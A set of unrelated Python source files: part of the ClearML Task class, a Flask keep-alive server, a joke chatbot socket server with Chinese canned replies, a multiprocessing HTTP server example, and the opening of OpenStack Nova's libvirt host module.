def exc_handler(self, exctype, value, traceback, *args, **kwargs):
if self._except_recursion_protection_flag:
# noinspection PyArgumentList
return sys.__excepthook__(exctype, value, traceback, *args, **kwargs)
self._except_recursion_protection_flag = True
self.exception = value
if self._orig_exc_handler:
# noinspection PyArgumentList
ret = self._orig_exc_handler(exctype, value, traceback, *args, **kwargs)
else:
# noinspection PyNoneFunctionAssignment, PyArgumentList
ret = sys.__excepthook__(exctype, value, traceback, *args, **kwargs)
self._except_recursion_protection_flag = False
return ret
def signal_handler(self, sig, frame):
self.signal = sig
org_handler = self._org_handlers.get(sig)
signal.signal(sig, org_handler or signal.SIG_DFL)
# if this is a sig term, we wait until __at_exit is called (basically do nothing)
if sig == signal.SIGINT:
# return original handler result
return org_handler if not callable(org_handler) else org_handler(sig, frame)
if self._signal_recursion_protection_flag:
# call original
os.kill(os.getpid(), sig)
return org_handler if not callable(org_handler) else org_handler(sig, frame)
self._signal_recursion_protection_flag = True
# call exit callback
if self._exit_callback:
# noinspection PyBroadException
try:
self._exit_callback()
except Exception:
pass
# remove stdout logger, just in case
# noinspection PyBroadException
try:
# noinspection PyProtectedMember
Logger._remove_std_logger()
except Exception:
pass
# noinspection PyUnresolvedReferences
os.kill(os.getpid(), sig)
self._signal_recursion_protection_flag = False
# return handler result
return org_handler if not callable(org_handler) else org_handler(sig, frame)
# we only remove the signals since this will hang subprocesses
if only_remove_signal_and_exception_hooks:
if not cls.__exit_hook:
return
if cls.__exit_hook._orig_exc_handler:
sys.excepthook = cls.__exit_hook._orig_exc_handler
cls.__exit_hook._orig_exc_handler = None
for s in cls.__exit_hook._org_handlers:
# noinspection PyBroadException
try:
signal.signal(s, cls.__exit_hook._org_handlers[s])
except Exception:
pass
cls.__exit_hook._org_handlers = {}
return
if cls.__exit_hook is None:
# noinspection PyBroadException
try:
cls.__exit_hook = ExitHooks(exit_callback)
cls.__exit_hook.hook()
except Exception:
cls.__exit_hook = None
else:
cls.__exit_hook.update_callback(exit_callback)
def _remove_at_exit_callbacks(self):
self.__register_at_exit(None, only_remove_signal_and_exception_hooks=True)
atexit.unregister(self.__exit_hook._exit_callback)
self._at_exit_called = True
@classmethod
def __get_task(
cls,
task_id=None, # type: Optional[str]
project_name=None, # type: Optional[str]
task_name=None, # type: Optional[str]
include_archived=True, # type: bool
tags=None, # type: Optional[Sequence[str]]
task_filter=None # type: Optional[dict]
):
# type: (...) -> Task
if task_id:
return cls(private=cls.__create_protection, task_id=task_id, log_to_backend=False)
if project_name:
res = cls._send(
cls._get_default_session(),
projects.GetAllRequest(
name=exact_match_regex(project_name)
)
)
project = get_single_result(entity='project', query=project_name, results=res.response.projects)
else:
project = None
# get default session, before trying to access tasks.Task so that we do not create two sessions.
session = cls._get_default_session()
system_tags = 'system_tags' if hasattr(tasks.Task, 'system_tags') else 'tags'
task_filter = task_filter or {}
if not include_archived:
task_filter['system_tags'] = (task_filter.get('system_tags') or []) + ['-{}'.format(cls.archived_tag)]
if tags:
task_filter['tags'] = (task_filter.get('tags') or []) + list(tags)
res = cls._send(
session,
tasks.GetAllRequest(
project=[project.id] if project else None,
name=exact_match_regex(task_name) if task_name else None,
only_fields=['id', 'name', 'last_update', system_tags],
**task_filter
)
)
res_tasks = res.response.tasks
# if we have more than one result, filter out the 'archived' results
# notice that if we only have one result we do get the archived one as well.
if len(res_tasks) > 1:
filtered_tasks = [t for t in res_tasks if not getattr(t, system_tags, None) or
cls.archived_tag not in getattr(t, system_tags, None)]
# if we did not filter everything (otherwise we have only archived tasks, so we return them)
if filtered_tasks:
res_tasks = filtered_tasks
task = get_single_result(
entity='task',
query={k: v for k, v in dict(
project_name=project_name, task_name=task_name, tags=tags,
include_archived=include_archived, task_filter=task_filter).items() if v},
results=res_tasks, raise_on_error=False)
if not task:
return None
return cls(
private=cls.__create_protection,
task_id=task.id,
log_to_backend=False,
)
@classmethod
def __get_tasks(
cls,
task_ids=None, # type: Optional[Sequence[str]]
project_name=None, # type: Optional[Union[Sequence[str],str]]
task_name=None, # type: Optional[str]
**kwargs # type: Any
):
# type: (...) -> List[Task]
if task_ids:
if isinstance(task_ids, six.string_types):
task_ids = [task_ids]
return [cls(private=cls.__create_protection, task_id=task_id, log_to_backend=False)
for task_id in task_ids]
return [cls(private=cls.__create_protection, task_id=task.id, log_to_backend=False)
for task in cls._query_tasks(project_name=project_name, task_name=task_name, **kwargs)]
@classmethod
def _query_tasks(cls, task_ids=None, project_name=None, task_name=None, **kwargs):
if not task_ids:
task_ids = None
elif isinstance(task_ids, six.string_types):
task_ids = [task_ids]
if project_name and isinstance(project_name, str):
project_names = [project_name]
else:
project_names = project_name
project_ids = []
if project_names:
for name in project_names:
res = cls._send(
cls._get_default_session(),
projects.GetAllRequest(
name=exact_match_regex(name)
)
)
project = get_single_result(entity='project', query=name, results=res.response.projects)
if project:
project_ids.append(project.id)
session = cls._get_default_session()
system_tags = 'system_tags' if hasattr(tasks.Task, 'system_tags') else 'tags'
only_fields = ['id', 'name', 'last_update', system_tags]
if kwargs and kwargs.get('only_fields'):
only_fields = list(set(kwargs.pop('only_fields')) | set(only_fields))
res = cls._send(
session,
tasks.GetAllRequest(
id=task_ids,
project=project_ids if project_ids else kwargs.pop('project', None),
name=task_name if task_name else kwargs.pop('name', None),
only_fields=only_fields,
**kwargs
)
)
return res.response.tasks
@classmethod
def __get_hash_key(cls, *args):
def normalize(x):
return "<{}>".format(x) if x is not None else ""
return ":".join(map(normalize, args))
@classmethod
def __get_last_used_task_id(cls, default_project_name, default_task_name, default_task_type):
hash_key = cls.__get_hash_key(
cls._get_api_server(), default_project_name, default_task_name, default_task_type)
# check if we have a cached task_id we can reuse
# it must be from within the last 24h and with the same project/name/type
task_sessions = SessionCache.load_dict(str(cls))
task_data = task_sessions.get(hash_key)
if task_data is None:
return None
try:
task_data['type'] = cls.TaskTypes(task_data['type'])
except (ValueError, KeyError):
LoggerRoot.get_base_logger().warning(
"Corrupted session cache entry: {}. "
"Unsupported task type: {}"
"Creating a new task.".format(hash_key, task_data['type']),
)
return None
return task_data
@classmethod
def __update_last_used_task_id(cls, default_project_name, default_task_name, default_task_type, task_id):
hash_key = cls.__get_hash_key(
cls._get_api_server(), default_project_name, default_task_name, default_task_type)
task_id = str(task_id)
# update task session cache
task_sessions = SessionCache.load_dict(str(cls))
last_task_session = {'time': time.time(), 'project': default_project_name, 'name': default_task_name,
'type': default_task_type, 'id': task_id}
# remove stale sessions
for k in list(task_sessions.keys()):
if ((time.time() - task_sessions[k].get('time', 0)) >
60 * 60 * cls.__task_id_reuse_time_window_in_hours):
task_sessions.pop(k)
# update current session
task_sessions[hash_key] = last_task_session
# store
SessionCache.store_dict(str(cls), task_sessions)
@classmethod
def __task_timed_out(cls, task_data):
return \
task_data and \
task_data.get('id') and \
task_data.get('time') and \
(time.time() - task_data.get('time')) > (60 * 60 * cls.__task_id_reuse_time_window_in_hours)
@classmethod
def __get_task_api_obj(cls, task_id, only_fields=None):
if not task_id or cls._offline_mode:
return None
all_tasks = cls._send(
cls._get_default_session(),
tasks.GetAllRequest(id=[task_id], only_fields=only_fields),
).response.tasks
# The task may not exist in environment changes
if not all_tasks:
return None
return all_tasks[0]
@classmethod
def __task_is_relevant(cls, task_data):
"""
Check that a cached task is relevant for reuse.
A task is relevant for reuse if:
1. It is not timed out i.e it was last use in the previous 24 hours.
2. It's name, project and type match the data in the server, so not
to override user changes made by using the UI.
:param task_data: A mapping from 'id', 'name', 'project', 'type' keys
to the task's values, as saved in the cache.
:return: True, if the task is relevant for reuse. False, if not.
"""
if not task_data:
return False
if cls.__task_timed_out(task_data):
return False
task_id = task_data.get('id')
if not task_id:
return False
# noinspection PyBroadException
try:
task = cls.__get_task_api_obj(task_id, ('id', 'name', 'project', 'type'))
except Exception:
task = None
if task is None:
return False
project_name = None
if task.project:
# noinspection PyBroadException
try:
project = cls._send(
cls._get_default_session(),
projects.GetByIdRequest(project=task.project)
).response.project
if project:
project_name = project.name
except Exception:
pass
if task_data.get('type') and \
task_data.get('type') not in (cls.TaskTypes.training, cls.TaskTypes.testing) and \
not Session.check_min_api_version(2.8):
print('WARNING: Changing task type to "{}" : '
'clearml-server does not support task type "{}", '
'please upgrade clearml-server.'.format(cls.TaskTypes.training, task_data['type'].value))
task_data['type'] = cls.TaskTypes.training
compares = (
(task.name, 'name'),
(project_name, 'project'),
(task.type, 'type'),
)
# compare after casting to string to avoid enum instance issues
# remember we might have replaced the api version by now, so enums are different
return all(six.text_type(server_data) == six.text_type(task_data.get(task_data_key))
for server_data, task_data_key in compares)
@classmethod
def __close_timed_out_task(cls, task_data):
if not task_data:
return False
task = cls.__get_task_api_obj(task_data.get('id'), ('id', 'status'))
if task is None:
return False
stopped_statuses = (
str(tasks.TaskStatusEnum.stopped),
str(tasks.TaskStatusEnum.published),
str(tasks.TaskStatusEnum.publishing),
str(tasks.TaskStatusEnum.closed),
str(tasks.TaskStatusEnum.failed),
str(tasks.TaskStatusEnum.completed),
)
if str(task.status) not in stopped_statuses:
cls._send(
cls._get_default_session(),
tasks.StoppedRequest(
task=task.id,
force=True,
status_message="Stopped timed out development task"
),
)
return True
return False
def __getstate__(self):
# type: () -> dict
return {'main': self.is_main_task(), 'id': self.id, 'offline': self.is_offline()}
def __setstate__(self, state):
if state['main'] and not self.__main_task:
Task.__forked_proc_main_pid = None
Task.__update_master_pid_task(task=state['id'])
if state['offline']:
Task.set_offline(offline_mode=state['offline'])
task = Task.init(
continue_last_task=state['id'],
auto_connect_frameworks={'detect_repository': False}) \
if state['main'] else Task.get_task(task_id=state['id'])
self.__dict__ = task.__dict__
|
keep_alive.py
|
from flask import Flask
from threading import Thread
app = Flask('')
@app.route('/')
def home():
return "By Hama-Kurdsh"
def run():
app.run(host='0.0.0.0',port=8080)
def keep_alive():
t = Thread(target=run)
t.start()
|
Server.py
|
# -*- coding: utf-8 -*-
import socket
import threading
import time
# 沙雕回复语料库
keywords = {'你是谁': '我是人工智障聊天机器人',
'今天天气如何': '荆州的天气可说不准呢',
'现在几点': '不要逗我了, 你电脑的任务栏上一眼就可以看到时间',
'吃饭了吗': '吃吃吃就知道吃',
'你昨天几点睡的': '真正的强者不需要睡觉',
'阿米娅是兔子还是驴': '是驴',
'我想睡觉': 'Doctor, 您现在还不能休息呢',
'奥尔加团长': '不要停下来啊',
'PHP': 'PHP是世界上最好的语言',
'Python': 'Python可能是世界上最好......学的语言',
'CSS': '天下苦CSS久矣',
'关机': '本人工智障暂时没有执行 shutdown now 的权限',
'于谦三大爱好': '抽烟喝酒烫头',
'相声四门功课': '吃喝抽烫, 脱鞋就唱, 刀枪棍棒, 斧钺钩叉',
}
class Server:
def __init__(self, host: str = '127.0.0.1', port: int = 8000):
# 创建socket
# 指定IPv4协议(AF_INET),IPv6协议请使用AF_INET6
# 指定使用TCP协议(SOCK_STREAM),UDP协议请使用SOCK_DGRAM
self.socket = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
# 绑定ip和port
# 绑定地址(host,port)到套接字, 在AF_INET下,以元组(host,port)的形式表示地址。
self.socket.bind((host, port))
# 监听端口
# 指定等待连接的最大数量
self.socket.listen(5)
# 输出
print('正在监听 ' + host + ':' + str(port))
# 给GUI新增的变量
self.bind_addr = host + ':' + str(port)
self.conn_socket = None
self.addr = None
def chat(self, c, addr):
c.sendall('你好, 人工智障聊天机器人为您服务, 输入 exit 即可退出聊天'.encode('utf-8'))
while True:
try:
data = c.recv(1024).decode('utf-8')
except ConnectionResetError:
c.close()
print(addr, '意外断开\n')
break
if data == 'exit':
c.sendall('exit'.encode('utf-8'))
c.close()
print('与', addr, '结束对话\n')
break
if data == 'force_exit':
c.close()
print('与', addr, '结束对话\n')
break
if data:
print('来自', addr, time.strftime('%Y-%m-%d %H:%M:%S', time.localtime()), '的消息:', data)
if data in keywords:
res = '(命中词库): ' + keywords[data]
c.sendall(res.encode('utf-8'))
print(res)
else:
# 复读机模式
res = '(复读机模式): ' + data
print(res)
# 人工回复模式
# print('请输入回复:', end='')
# res = input()
c.sendall(res.encode('utf-8'))
def run(self):
# 接收数据
while True:
# 接受一个新连接,阻塞的,只有接收到新连接才会往下走
# s.accept(), 接受TCP链接并返回(conn, address),其中conn是新的套接字对象,可以用来接收和发送数据,address是链接客户端的地址
c, addr = self.socket.accept()
print('连接地址:', addr)
# 每一次连接,都要创建新线程,否则一次只能处理一个连接
t = threading.Thread(target=self.chat(c, addr))
t.start()
if __name__ == '__main__':
server = Server()
server.run()
|
mp_webserver.py
|
#
# Example where a pool of http servers share a single listening socket
#
# On Windows this module depends on the ability to pickle a socket
# object so that the worker processes can inherit a copy of the server
# object. (We import `multiprocessing.reduction` to enable this pickling.)
#
# Not sure if we should synchronize access to `socket.accept()` method by
# using a process-shared lock -- does not seem to be necessary.
#
# Copyright (c) 2006-2008, R Oudkerk
# All rights reserved.
#
import os
import sys
from multiprocessing import Process, current_process, freeze_support
from http.server import HTTPServer
from http.server import SimpleHTTPRequestHandler
if sys.platform == 'win32':
import multiprocessing.reduction # make sockets pickable/inheritable
def note(format, *args):
sys.stderr.write('[%s]\t%s\n' % (current_process().name, format%args))
class RequestHandler(SimpleHTTPRequestHandler):
# we override log_message() to show which process is handling the request
def log_message(self, format, *args):
note(format, *args)
def serve_forever(server):
note('starting server')
try:
server.serve_forever()
except KeyboardInterrupt:
pass
def runpool(address, number_of_processes):
# create a single server object -- children will each inherit a copy
server = HTTPServer(address, RequestHandler)
# create child processes to act as workers
for i in range(number_of_processes-1):
Process(target=serve_forever, args=(server,)).start()
# main process also acts as a worker
serve_forever(server)
def test():
DIR = os.path.join(os.path.dirname(__file__), '..')
ADDRESS = ('localhost', 8000)
NUMBER_OF_PROCESSES = 4
print('Serving at http://%s:%d using %d worker processes' % \
(ADDRESS[0], ADDRESS[1], NUMBER_OF_PROCESSES))
print('To exit press Ctrl-' + ['C', 'Break'][sys.platform=='win32'])
os.chdir(DIR)
runpool(ADDRESS, NUMBER_OF_PROCESSES)
if __name__ == '__main__':
freeze_support()
test()
|
host.py
|
# Copyright 2010 United States Government as represented by the
# Administrator of the National Aeronautics and Space Administration.
# All Rights Reserved.
# Copyright (c) 2010 Citrix Systems, Inc.
# Copyright (c) 2011 Piston Cloud Computing, Inc
# Copyright (c) 2012 University Of Minho
# (c) Copyright 2013 Hewlett-Packard Development Company, L.P.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
"""
Manages information about the host OS and hypervisor.
This class encapsulates a connection to the libvirt
daemon and provides certain higher level APIs around
the raw libvirt API. These APIs are then used by all
the other libvirt related classes
"""
from collections import defaultdict
import operator
import os
import socket
import sys
import threading
import traceback
from eventlet import greenio
from eventlet import greenthread
from eventlet import patcher
from eventlet import tpool
from oslo_log import log as logging
from oslo_utils import encodeutils
from oslo_utils import excutils
from oslo_utils import importutils
from oslo_utils import units
from oslo_utils import versionutils
import six
from nova.compute import utils as compute_utils
import nova.conf
from nova import context as nova_context
from nova import exception
from nova.i18n import _
from nova import rpc
from nova import utils
from nova.virt import event as virtevent
from nova.virt.libvirt import config as vconfig
from nova.virt.libvirt import guest as libvirt_guest
from nova.virt.libvirt import utils as libvirt_utils
libvirt = None
LOG = logging.getLogger(__name__)
native_socket = patcher.original('socket')
native_threading = patcher.original("threading")
native_Queue = patcher.original("Queue" if six.PY2 else "queue")
CONF = nova.conf.CONF
# This list is for libvirt hypervisor drivers that need special handling.
# This is *not* the complete list of supported hypervisor drivers.
HV_DRIVER_QEMU = "QEMU"
HV_DRIVER_XEN = "Xen"
SEV_KERNEL_PARAM_FILE = '/sys/module/kvm_amd/parameters/sev'
class Host(object):
def __init__(self, uri, read_only=False,
conn_event_handler=None,
lifecycle_event_handler=None):
global libvirt
if libvirt is None:
libvirt = importutils.import_module('libvirt')
self._uri = uri
self._read_only = read_only
self._initial_connection = True
self._conn_event_handler = conn_event_handler
self._conn_event_handler_queue = six.moves.queue.Queue()
self._lifecycle_event_handler = lifecycle_event_handler
self._caps = None
self._domain_caps = None
self._hostname = None
self._wrapped_conn = None
self._wrapped_conn_lock = threading.Lock()
self._event_queue = None
self._events_delayed = {}
# Note(toabctl): During a reboot of a domain, STOPPED and
# STARTED events are sent. To prevent shutting
# down the domain during a reboot, delay the
# STOPPED lifecycle event some seconds.
self._lifecycle_delay = 15
self._initialized = False
# AMD SEV is conditional on support in the hardware, kernel,
# qemu, and libvirt. This is determined on demand and
# memoized by the supports_amd_sev property below.
self._supports_amd_sev = None
def _native_thread(self):
"""Receives async events coming in from libvirtd.
This is a native thread which runs the default
libvirt event loop implementation. This processes
any incoming async events from libvirtd and queues
them for later dispatch. This thread is only
permitted to use libvirt python APIs, and the
driver.queue_event method. In particular any use
of logging is forbidden, since it will confuse
eventlet's greenthread integration
"""
while True:
libvirt.virEventRunDefaultImpl()
def _dispatch_thread(self):
"""Dispatches async events coming in from libvirtd.
This is a green thread which waits for events to
arrive from the libvirt event loop thread. This
then dispatches the events to the compute manager.
"""
while True:
self._dispatch_events()
def _conn_event_thread(self):
"""Dispatches async connection events"""
# NOTE(mdbooth): This thread doesn't need to jump through the same
# hoops as _dispatch_thread because it doesn't interact directly
# with the libvirt native thread.
while True:
self._dispatch_conn_event()
def _dispatch_conn_event(self):
# NOTE(mdbooth): Splitting out this loop looks redundant, but it
# means we can easily dispatch events synchronously from tests and
# it isn't completely awful.
handler = self._conn_event_handler_queue.get()
try:
handler()
except Exception:
LOG.exception(_('Exception handling connection event'))
finally:
self._conn_event_handler_queue.task_done()
@staticmethod
def _event_lifecycle_callback(conn, dom, event, detail, opaque):
"""Receives lifecycle events from libvirt.
NB: this method is executing in a native thread, not
an eventlet coroutine. It can only invoke other libvirt
APIs, or use self._queue_event(). Any use of logging APIs
in particular is forbidden.
"""
self = opaque
uuid = dom.UUIDString()
transition = None
if event == libvirt.VIR_DOMAIN_EVENT_STOPPED:
transition = virtevent.EVENT_LIFECYCLE_STOPPED
elif event == libvirt.VIR_DOMAIN_EVENT_STARTED:
transition = virtevent.EVENT_LIFECYCLE_STARTED
elif event == libvirt.VIR_DOMAIN_EVENT_SUSPENDED:
if detail == libvirt.VIR_DOMAIN_EVENT_SUSPENDED_POSTCOPY:
transition = virtevent.EVENT_LIFECYCLE_POSTCOPY_STARTED
# FIXME(mriedem): VIR_DOMAIN_EVENT_SUSPENDED_MIGRATED is also sent
# when live migration of the guest fails, so we cannot simply rely
# on the event itself but need to check if the job itself was
# successful.
# elif detail == libvirt.VIR_DOMAIN_EVENT_SUSPENDED_MIGRATED:
# transition = virtevent.EVENT_LIFECYCLE_MIGRATION_COMPLETED
else:
transition = virtevent.EVENT_LIFECYCLE_PAUSED
elif event == libvirt.VIR_DOMAIN_EVENT_RESUMED:
transition = virtevent.EVENT_LIFECYCLE_RESUMED
if transition is not None:
self._queue_event(virtevent.LifecycleEvent(uuid, transition))
def _close_callback(self, conn, reason, opaque):
close_info = {'conn': conn, 'reason': reason}
self._queue_event(close_info)
@staticmethod
def _test_connection(conn):
try:
conn.getLibVersion()
return True
except libvirt.libvirtError as e:
if (e.get_error_code() in (libvirt.VIR_ERR_SYSTEM_ERROR,
libvirt.VIR_ERR_INTERNAL_ERROR) and
e.get_error_domain() in (libvirt.VIR_FROM_REMOTE,
libvirt.VIR_FROM_RPC)):
LOG.debug('Connection to libvirt broke')
return False
raise
@staticmethod
def _connect_auth_cb(creds, opaque):
if len(creds) == 0:
return 0
raise exception.InternalError(
_("Can not handle authentication request for %d credentials")
% len(creds))
@staticmethod
def _connect(uri, read_only):
auth = [[libvirt.VIR_CRED_AUTHNAME,
libvirt.VIR_CRED_ECHOPROMPT,
libvirt.VIR_CRED_REALM,
libvirt.VIR_CRED_PASSPHRASE,
libvirt.VIR_CRED_NOECHOPROMPT,
libvirt.VIR_CRED_EXTERNAL],
Host._connect_auth_cb,
None]
flags = 0
if read_only:
flags = libvirt.VIR_CONNECT_RO
# tpool.proxy_call creates a native thread. Due to limitations
# with eventlet locking we cannot use the logging API inside
# the called function.
return tpool.proxy_call(
(libvirt.virDomain, libvirt.virConnect),
libvirt.openAuth, uri, auth, flags)
def _queue_event(self, event):
"""Puts an event on the queue for dispatch.
This method is called by the native event thread to
put events on the queue for later dispatch by the
green thread. Any use of logging APIs is forbidden.
"""
if self._event_queue is None:
return
# Queue the event...
self._event_queue.put(event)
# ...then wakeup the green thread to dispatch it
c = ' '.encode()
self._event_notify_send.write(c)
self._event_notify_send.flush()
def _dispatch_events(self):
"""Wait for & dispatch events from native thread
Blocks until native thread indicates some events
are ready. Then dispatches all queued events.
"""
# Wait to be notified that there are some
# events pending
try:
_c = self._event_notify_recv.read(1)
assert _c
except ValueError:
return # will be raised when pipe is closed
# Process as many events as possible without
# blocking
last_close_event = None
while not self._event_queue.empty():
try:
event = self._event_queue.get(block=False)
if isinstance(event, virtevent.LifecycleEvent):
# call possibly with delay
self._event_emit_delayed(event)
elif 'conn' in event and 'reason' in event:
last_close_event = event
except native_Queue.Empty:
pass
if last_close_event is None:
return
conn = last_close_event['conn']
# get_new_connection may already have disabled the host,
# in which case _wrapped_conn is None.
with self._wrapped_conn_lock:
if conn == self._wrapped_conn:
reason = str(last_close_event['reason'])
msg = _("Connection to libvirt lost: %s") % reason
self._wrapped_conn = None
self._queue_conn_event_handler(False, msg)
def _event_emit_delayed(self, event):
"""Emit events - possibly delayed."""
def event_cleanup(gt, *args, **kwargs):
"""Callback function for greenthread. Called
to cleanup the _events_delayed dictionary when an event
was called.
"""
event = args[0]
self._events_delayed.pop(event.uuid, None)
# Cleanup possible delayed stop events.
if event.uuid in self._events_delayed.keys():
self._events_delayed[event.uuid].cancel()
self._events_delayed.pop(event.uuid, None)
LOG.debug("Removed pending event for %s due to "
"lifecycle event", event.uuid)
if event.transition == virtevent.EVENT_LIFECYCLE_STOPPED:
# Delay STOPPED event, as they may be followed by a STARTED
# event in case the instance is rebooting
id_ = greenthread.spawn_after(self._lifecycle_delay,
self._event_emit, event)
self._events_delayed[event.uuid] = id_
# add callback to cleanup self._events_delayed dict after
# event was called
id_.link(event_cleanup, event)
else:
self._event_emit(event)
def _event_emit(self, event):
if self._lifecycle_event_handler is not None:
self._lifecycle_event_handler(event)
def _init_events_pipe(self):
"""Create a self-pipe for the native thread to synchronize on.
This code is taken from the eventlet tpool module, under terms
of the Apache License v2.0.
"""
self._event_queue = native_Queue.Queue()
try:
rpipe, wpipe = os.pipe()
self._event_notify_send = greenio.GreenPipe(wpipe, 'wb', 0)
self._event_notify_recv = greenio.GreenPipe(rpipe, 'rb', 0)
except (ImportError, NotImplementedError):
# This is Windows compatibility -- use a socket instead
# of a pipe because pipes don't really exist on Windows.
sock = native_socket.socket(socket.AF_INET, socket.SOCK_STREAM)
sock.bind(('localhost', 0))
sock.listen(50)
csock = native_socket.socket(socket.AF_INET, socket.SOCK_STREAM)
csock.connect(('localhost', sock.getsockname()[1]))
nsock, addr = sock.accept()
self._event_notify_send = nsock.makefile('wb', 0)
gsock = greenio.GreenSocket(csock)
self._event_notify_recv = gsock.makefile('rb', 0)
def _init_events(self):
"""Initializes the libvirt events subsystem.
This requires running a native thread to provide the
libvirt event loop integration. This forwards events
to a green thread which does the actual dispatching.
"""
self._init_events_pipe()
LOG.debug("Starting native event thread")
self._event_thread = native_threading.Thread(
target=self._native_thread)
self._event_thread.setDaemon(True)
self._event_thread.start()
LOG.debug("Starting green dispatch thread")
utils.spawn(self._dispatch_thread)
def _get_new_connection(self):
# call with _wrapped_conn_lock held
LOG.debug('Connecting to libvirt: %s', self._uri)
# This will raise an exception on failure
wrapped_conn = self._connect(self._uri, self._read_only)
try:
LOG.debug("Registering for lifecycle events %s", self)
wrapped_conn.domainEventRegisterAny(
None,
libvirt.VIR_DOMAIN_EVENT_ID_LIFECYCLE,
self._event_lifecycle_callback,
self)
except Exception as e:
LOG.warning("URI %(uri)s does not support events: %(error)s",
{'uri': self._uri, 'error': e})
try:
LOG.debug("Registering for connection events: %s", str(self))
wrapped_conn.registerCloseCallback(self._close_callback, None)
except libvirt.libvirtError as e:
LOG.warning("URI %(uri)s does not support connection"
" events: %(error)s",
{'uri': self._uri, 'error': e})
return wrapped_conn
def _queue_conn_event_handler(self, *args, **kwargs):
if self._conn_event_handler is None:
return
def handler():
return self._conn_event_handler(*args, **kwargs)
self._conn_event_handler_queue.put(handler)
def _get_connection(self):
# multiple concurrent connections are protected by _wrapped_conn_lock
with self._wrapped_conn_lock:
# Drop the existing connection if it is not usable
if (self._wrapped_conn is not None and
not self._test_connection(self._wrapped_conn)):
self._wrapped_conn = None
# Connection was previously up, and went down
self._queue_conn_event_handler(
False, _('Connection to libvirt lost'))
if self._wrapped_conn is None:
try:
# This will raise if it fails to get a connection
self._wrapped_conn = self._get_new_connection()
except Exception as ex:
with excutils.save_and_reraise_exception():
# If we previously had a connection and it went down,
# we generated a down event for that above.
# We also want to generate a down event for an initial
# failure, which won't be handled above.
if self._initial_connection:
self._queue_conn_event_handler(
False,
_('Failed to connect to libvirt: %(msg)s') %
{'msg': ex})
finally:
self._initial_connection = False
self._queue_conn_event_handler(True, None)
return self._wrapped_conn
def get_connection(self):
"""Returns a connection to the hypervisor
This method should be used to create and return a well
configured connection to the hypervisor.
:returns: a libvirt.virConnect object
"""
try:
conn = self._get_connection()
except libvirt.libvirtError as ex:
LOG.exception(_("Connection to libvirt failed: %s"), ex)
payload = dict(ip=CONF.my_ip,
method='_connect',
reason=ex)
ctxt = nova_context.get_admin_context()
rpc.get_notifier('compute').error(ctxt,
'compute.libvirt.error',
payload)
compute_utils.notify_about_libvirt_connect_error(
ctxt, ip=CONF.my_ip, exception=ex, tb=traceback.format_exc())
raise exception.HypervisorUnavailable(host=CONF.host)
return conn
@staticmethod
def _libvirt_error_handler(context, err):
# Just ignore instead of default outputting to stderr.
pass
def initialize(self):
if self._initialized:
return
# NOTE(dkliban): Error handler needs to be registered before libvirt
# connection is used for the first time. Otherwise, the
# handler does not get registered.
libvirt.registerErrorHandler(self._libvirt_error_handler, None)
libvirt.virEventRegisterDefaultImpl()
self._init_events()
LOG.debug("Starting connection event dispatch thread")
utils.spawn(self._conn_event_thread)
self._initialized = True
def _version_check(self, lv_ver=None, hv_ver=None, hv_type=None,
op=operator.lt):
"""Check libvirt version, hypervisor version, and hypervisor type
:param hv_type: hypervisor driver from the top of this file.
"""
conn = self.get_connection()
try:
if lv_ver is not None:
libvirt_version = conn.getLibVersion()
if op(libvirt_version,
versionutils.convert_version_to_int(lv_ver)):
return False
if hv_ver is not None:
hypervisor_version = conn.getVersion()
if op(hypervisor_version,
versionutils.convert_version_to_int(hv_ver)):
return False
if hv_type is not None:
hypervisor_type = conn.getType()
if hypervisor_type != hv_type:
return False
return True
except Exception:
return False
def has_min_version(self, lv_ver=None, hv_ver=None, hv_type=None):
return self._version_check(
lv_ver=lv_ver, hv_ver=hv_ver, hv_type=hv_type, op=operator.lt)
def has_version(self, lv_ver=None, hv_ver=None, hv_type=None):
return self._version_check(
lv_ver=lv_ver, hv_ver=hv_ver, hv_type=hv_type, op=operator.ne)
def get_guest(self, instance):
"""Retrieve libvirt guest object for an instance.
All libvirt error handling should be handled in this method and
relevant nova exceptions should be raised in response.
:param instance: a nova.objects.Instance object
:returns: a nova.virt.libvirt.Guest object
:raises exception.InstanceNotFound: The domain was not found
:raises exception.InternalError: A libvirt error occurred
"""
return libvirt_guest.Guest(self._get_domain(instance))
def _get_domain(self, instance):
"""Retrieve libvirt domain object for an instance.
All libvirt error handling should be handled in this method and
relevant nova exceptions should be raised in response.
:param instance: a nova.objects.Instance object
:returns: a libvirt.Domain object
:raises exception.InstanceNotFound: The domain was not found
:raises exception.InternalError: A libvirt error occurred
"""
try:
conn = self.get_connection()
return conn.lookupByUUIDString(instance.uuid)
except libvirt.libvirtError as ex:
error_code = ex.get_error_code()
if error_code == libvirt.VIR_ERR_NO_DOMAIN:
raise exception.InstanceNotFound(instance_id=instance.uuid)
msg = (_('Error from libvirt while looking up %(instance_name)s: '
'[Error Code %(error_code)s] %(ex)s') %
{'instance_name': instance.name,
'error_code': error_code,
'ex': ex})
raise exception.InternalError(msg)
def list_guests(self, only_running=True, only_guests=True):
"""Get a list of Guest objects for nova instances
:param only_running: True to only return running instances
:param only_guests: True to filter out any host domain (eg Dom-0)
See method "list_instance_domains" for more information.
:returns: list of Guest objects
"""
return [libvirt_guest.Guest(dom) for dom in self.list_instance_domains(
only_running=only_running, only_guests=only_guests)]
def list_instance_domains(self, only_running=True, only_guests=True):
"""Get a list of libvirt.Domain objects for nova instances
:param only_running: True to only return running instances
:param only_guests: True to filter out any host domain (eg Dom-0)
Query libvirt to a get a list of all libvirt.Domain objects
that correspond to nova instances. If the only_running parameter
is true this list will only include active domains, otherwise
inactive domains will be included too. If the only_guests parameter
is true the list will have any "host" domain (aka Xen Domain-0)
filtered out.
:returns: list of libvirt.Domain objects
"""
flags = libvirt.VIR_CONNECT_LIST_DOMAINS_ACTIVE
if not only_running:
flags = flags | libvirt.VIR_CONNECT_LIST_DOMAINS_INACTIVE
alldoms = self.get_connection().listAllDomains(flags)
doms = []
for dom in alldoms:
if only_guests and dom.ID() == 0:
continue
doms.append(dom)
return doms
def get_online_cpus(self):
"""Get the set of CPUs that are online on the host
Method is only used by NUMA code paths which check on
libvirt version >= 1.0.4. getCPUMap() was introduced in
libvirt 1.0.0.
:returns: set of online CPUs, raises libvirtError on error
"""
